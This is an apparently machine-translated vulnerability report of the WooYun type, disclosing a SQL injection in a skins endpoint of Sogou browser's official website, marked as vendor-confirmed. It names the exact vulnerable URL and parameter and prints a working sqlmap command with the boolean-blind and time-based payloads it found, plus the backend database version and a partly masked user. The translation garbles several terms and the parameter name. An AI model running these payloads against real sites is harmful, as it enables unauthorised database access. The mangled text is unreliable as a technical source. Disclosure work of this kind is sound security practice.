漏洞标题 搜狗浏览器官网存在SQL注入漏洞 相关制造商 搜狗 漏洞作者 猪人 提交时间 2016-05-10 00: 36 公共时间 2016-06-28 08: 30 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 15 漏洞状态 制造商已确认 标签标签 漏洞详细信息 #1漏洞网站 http://ie.sogou.com/ #2注射点 http://ie.sogou.com/skins/index.php?route=theme/theme/getRelatedThemes&tid=52975&tag=70,11743,11950 #3注射参数 唐 漏洞证明: Python sqlmap.py -u'http://ie.sogou.com/skins/index.php?route=theme/theme/getRelatedThemes&tid=52975&tag=70,11743,11950'-p tag Sqlmap使用总共0个HTTP(s)请求:标识了以下注入点 --- 参数:标签(GET) 输入:基于布尔值的盲 标题: AND基于布尔的盲 - WHERE或H * ING子句 有效载荷: route=theme/theme/getRelatedThemes& tid=52975& tag=70,11743,11950)AND 7211=7211 AND(7361=7361 输入:和/或基于时间的盲 标题: MySQL> 5.0.11 AND基于时间的盲人 有效载荷: route=theme/theme/getRelatedThemes& tid=52975& tag=70,11743,11950)AND SLEEP(5)AND(9120=9120 --- [23: 41: 53] [INFO]后端DBMS是MySQL 后端DBMS: MySQL 5.0.11 用户: setool *** 修理计划: 过滤 版权声明:转载请注明出处猪猪人@乌云